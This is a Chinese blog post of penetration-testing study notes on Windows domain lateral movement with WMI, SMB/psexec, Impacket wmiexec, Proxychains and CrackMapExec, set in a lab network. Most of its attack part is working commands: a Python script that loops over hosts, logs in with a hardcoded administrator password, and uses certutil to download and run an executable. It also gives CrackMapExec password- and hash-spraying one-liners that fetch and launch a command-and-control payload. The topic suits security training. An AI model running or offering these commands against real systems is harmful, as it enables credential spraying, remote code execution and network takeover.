129- 横向移动&Wmi&cscript&Smb&CrackMapExec&ProxyChains&Impacket

最新推荐文章于 2024-09-11 13:41:53 发布
最新推荐文章于 2024-09-11 13:41:53 发布
阅读量713 收藏 10
点赞数 8
分类专栏: # 小迪安全学习笔记 文章标签: 网络安全 安全 系统安全 网络 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63855540/article/details/141436074
版权

本章任然使用上一节的拓扑

章节点

IPC,WMI,SMB,PTH,PTK,PTT,SPN,WinRM,WinRS,RDP,Plink,DCOM,SSH;Exchange,LLMNR投毒,Plink,DCOM,Kerberos_TGS,GPO&DACL,

域控提权漏洞,约束委派,数据库攻防,系统补丁下发执行,EDR定向下发执行等

#域信息收集-目标&用户&凭据&网络

#域横向移动-wmi-自带&命令&套件&插件

1、wmi

wmi全称Windows Management Instrumentation

WMI是通过135端口进行利用,支持用户名明文不支持hash的方式进行认证,

并且该方法不会在目标日志系统留下痕迹。

我在网上看到这个信息:

win10 使用该命令会报错

‘wmic’ 不是内部或外部命令,也不是可运行的程序 或批处理文件。

在Win10中,wmic已经归入C:\Windows\System32\wbem文件夹,而环境变量只设置到C:\Windows\System32,因此找不到wmic

只需要添加C:\Windows\System32\wbem 到环境变量——系统变量的Path变量

2、cscript

3、wmiexec-impacket

可以使用hash值进行操作

4、SMB

使用psexec 这是微软官方的工具不会被杀,可以直接去官网下载pstools

需要主机上开启了smb服务才可以

使用smb有时候需要管理员权限(这里的管理员是运行此命令的管理员权限,不知道在攻击上有关系没)才可以,使用此命令也是可以反弹回一个cmd

使用专门的psexec程序或者smbexec.py脚本进行移动还可以使用hash进行操作

最后可以使用cs自带的psexec进行横向移动

5、service

这个命令敲完也是没有回显的

6、Windows+Proxifier+Python_exp

和上期的思路一样通过代理在本机上写脚本去跑

import os

ips=['192.168.3.21','192.168.3.25','192.168.3.29','192.168.3.28','192.168.3.30','192.168.3.32']

def down():
    for ip in ips:
        wmi_exec='python3 .\\wmiexec.py ./administrator:admin!@#45@%s "cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/webserver4444.exe c:/webserver4444.exe"'%ip
        print(wmi_exec)
        os.system(wmi_exec)
        
def zx():
    for ip in ips:
        wmi_exec='python3 .\\wmiexec.py ./administrator:admin!@#45@%s "c:/webserver4444.exe"'%ip
        print(wmi_exec)
        os.system(wmi_exec)
        
if __name__ == '__main__':
    down()
    zx()

7、域横向移动-工具-Proxychains&CrackMapExec

CrackMapExec

Github:https://github.com/Porchetta-Industries/CrackMapExec

官方手册:https://mpgn.gitbook.io/crackmapexec/

部分案例:CrackMapExec:一款针对大型Windows活动目录(AD)的后渗透工具 - FreeBuf网络安全行业门户

下载对应release,建立socks连接,设置socks代理,配置规则,调用!

Linux Proxychains使用

安装使用:proxychains 安装和proxychains 代理nmap-CSDN博客

代理配置:Proxychains.conf 代理调用:Proxychains 命令

使用

密码喷射域登录(验证用户名密码是否正确,默认域用户):

  • proxychains crackmapexec smb 192.168.20.10-30 -u administrator -p 'admin@123'

密码喷射本地登录(验证用户名密码是否正确):

  • proxychains crackmapexec smb 192.168.20.10-30 -u administrator -p 'admin@123' --local-auth

密码喷射本地登录命令执行:

  • proxychains crackmapexec smb 192.168.20.10-30 -u administrator -p 'admin@123' -x 'whoami' --local-auth

hash喷射域登录命令执行:

  • proxychains crackmapexec smb 192.168.3.21-32 -u administrator -H 'ccef208c6485269c20db2cad21734fe7' -x 'cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/webserver4444.exe c:/webserver4444.exe & c:/webserver4444.exe'

cs上线为反向连接,需要代理转发,转发上线

密码喷射本地登录命令执行上线:

  • proxychains crackmapexec smb 192.168.20.10-30 -u administrator -p 'admin@123' -x 'cmd.exe /c certutil -urlcache -split -f http://192.168.20.20/2222.exe c:/2222.exe & c:/2222.exe' --local-auth

密码喷射域登录命令执行上线:

  • proxychains crackmapexec smb 192.168.20.10-30 -u administrator -p 'admin@123' -x 'cmd.exe /c certutil -urlcache -split -f http://192.168.20.20/2222.exe c:/2222.exe & c:/2222.exe'

密码喷射本地&域登录命令执行全自动上线:

写两个字典,一个放用户名,另一个放密码

  • proxychains crackmapexec smb 192.168.20.10-30 -u user.txt -p pass.txt -x 'cmd.exe /c certutil -urlcache -split -f http://192.168.20.20/2222.exe c:/2222.exe & c:/2222.exe'

另外kali上面自带了这个

dreamer292
关注
专栏目录
红队内网攻防渗透:内网渗透之内网对抗:横向移动篇&入口切换&SMB共享&WMI管道&DCOM组件&Impacket套件&CS插件
HACKONE的博客
06-22 493
因此在内网渗透中,我们可以使用WMI进行横向移动,支持用户名明文或者hash的方式进行认证,并且该方法不会在目标日志系统留下痕迹。SMB服务通常由文件服务器提供,它允许客户端计算机通过网络访问服务器上的共享资源。通过SMB用户可以在网络上访问和共享文件夹、文件以及打印机,从而实现在不同计算机之间方便地共享数据和打印输出。它支持不同的两台机器上的组件间的通信,不论它们是运行在局域网、广域网、还是Internet上。这里ping 3.32 是能ping通的 所以防火墙入站规则是关闭的,可以执行正向shell。
CrackMapExecWin, 为 Windows 编译的伟大CrackMapExec工具.zip
10-10
CrackMapExecWin, 为 Windows 编译的伟大CrackMapExec工具 CrackMapExecWin描述为 Windows 编译的伟大 CrackMapExec 工具特性最新 2.2 版本编译为 x86,因此应该在 x86 和 x64 平台上工作用法下载整个归档文件。提取并运行 cra
129天:内网安全-横向移动&Wmi&Smb&CrackMapExec&ProxyChains&Impacket
weixin_71529930的博客
08-07 814
这里这个环境继续上一篇文章搭建的环境。
【内网安全横向移动&Wmi&Smb&CrackMapExec&ProxyChains&Impacket
今天是几号的博客
03-26 1220
在Win10中,wmic已经归入C:\Windows\System32\wbem文件夹,而环境变量只设置到C:\Windows\System32,因此找不到wmic。这几个端口都是与文件共享和打印机共享有关的端口,而且在这几个端口上经常爆发很严重的漏洞。安装使用:Microsoft Windows下的 win32k.sys是Windows子系统的内核部分,是一个内核模式设备驱动程序,它。
内网横向移动Wmi&Smb&CrackMapExec&ProxyChains&Impacket
剁椒鱼头没剁椒的博客
06-30 1156
Windows中的wmiWindows管理工具,它是Windows操作系统中管理数据和操作的基础模块,并且wmic 是通过 135 端口进行利用,支持用户名明文或者 hash 的方式进行认证,同时该方法不会在目标日志系统留下痕迹。
推荐开源项目:CrackMapExecWin - 动态Windows渗透测试利器
gitblog_00012的博客
05-28 385
推荐开源项目:CrackMapExecWin - 动态Windows渗透测试利器 项目地址:https://gitcode.com/maaaaz/CrackMapExecWin 1、项目介绍 CrackMapExecWin 是一款专为Windows平台编译的CrackMapExec工具的最新版本。作为一个强大的端点渗透测试工具,它允许安全研究人员和红队操作者快速、有效地枚举和利用网络中的漏洞。由b...
6、内网安全-横向移动&Wmi&Smb&CrackMapExec&ProxyChains&Impacket_内网横移 代理工具
2401_84263434的博客
05-02 306
内部命令:(利用出网主机192.168.3.31上线后执行命令,密码明文传递通过验证,cmd命令执行)的方式进行认证,并且该方法不会在目标日志系统留下痕迹。端口进行利用,支持用户名明文或者。传递来远程执行,条件。
内网安全 - 域横向 smb&wmi
acepanhuan的博客
03-15 312
通过官方PSTools中psexec连接时只能用明文密码进行连接,但是不会被杀毒软件拦截通过官方自带命令WMIC时,只支持明文且没有回显需自己读取通过官方自带命令cscriptwmiexec.vbs配合时有回显,但是只支持明文通过非官方impacket-examples-windows中psexecsmbexecwmiexec连接时可支持密文hash密码连接,但容易被杀毒软件拦截现在基本通过mimikatz获取的密码都是密文的impacket-examples-windows下载地址。
第60天:权限提升-MY&MS&ORA等SQL数据库提权1
08-03
MOF文件是Windows Management Instrumentation (WMI)的一部分,用于描述管理对象。在MySQL中,攻击者可以将自定义的MOF文件导出到系统目录,如`c:/windows/system32/wbem/`,然后通过`SELECT load_file()`命令加载该...
内网渗透工具CrackMapExec的使用
勤能补拙、勤能补拙
01-13 1020
CrackMapExec 也简称cme ,是一款内网域渗透的工具,可以对域进行信息收集或者一些常见域漏洞的探测。
内网渗透之横向移动wmi&smb&密码喷射CrackMapExec
m0_62207170的博客
04-22 1896
内网渗透之横向移动wmi&smb&密码喷射CrackMapExec
6、内网安全-横向移动&Wmi&Smb&CrackMapExec&ProxyChains&Impacket
m0_65842464的博客
02-16 1595
在内网环境中,主机192.168.3.31有外网网卡能出网,在取得该主机权限后上线,搭建web应用构造后门下载地址,利用该主机执行相关命令可以进行横向移动,通过传递命令其他主机也可访问下载主机192.168.3.31的后门并执行,从而拿下内网中更多不出网主机。前提:用户名密码明文或哈希值抓取1、内网安全-域信息收集&CS插件&Adfind&BloodHound-CSDN博客一、域横向移动-WMI-自带命令套件插件WMI是通过135端口进行利用,支持用户名明文或者hash。
内网横向之PTH
qq_44029310的博客
10-16 2171
内网横向之PTH,以前的笔记整理,方便查看翻找。本文包括PsExecCrackMapExecWMI
windows内网渗透之CrackMapExec
xijieyuan2qi的博客
09-15 3016
cme(CrackMapExec)内网渗透利器。记录一下方便以后查看。有一些命令是网上查的
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8458
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网站安全需求分析与安全保护工程
weixin_49171105的博客
09-09 853
网站:是基于B/S技术架构的综合信息服务平台,主要提供网页信息及业务后台对外接口服务。
SSHamble:一款针对SSH技术安全的研究与分析工具
最新发布
FreeBuf_的博客
09-11 1004
SSHamble是一款功能强大的SSH技术安全分析与研究工具,该工具基于Go语言开发,可以帮助广大研究人员更好地分析SSH相关的安全技术与缺陷问题。
域渗透技术探讨:PassTheHash与PassTheKey解析
PTK使得攻击者可以更隐蔽地在系统间移动,因为使用密钥通常比使用哈希更难以检测。 0x05 技术发展与防御 微软对PTH的防御措施从最初的指导到补丁发布,再到改进的凭证管理策略,反映了防御策略的演变。然而,如同...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值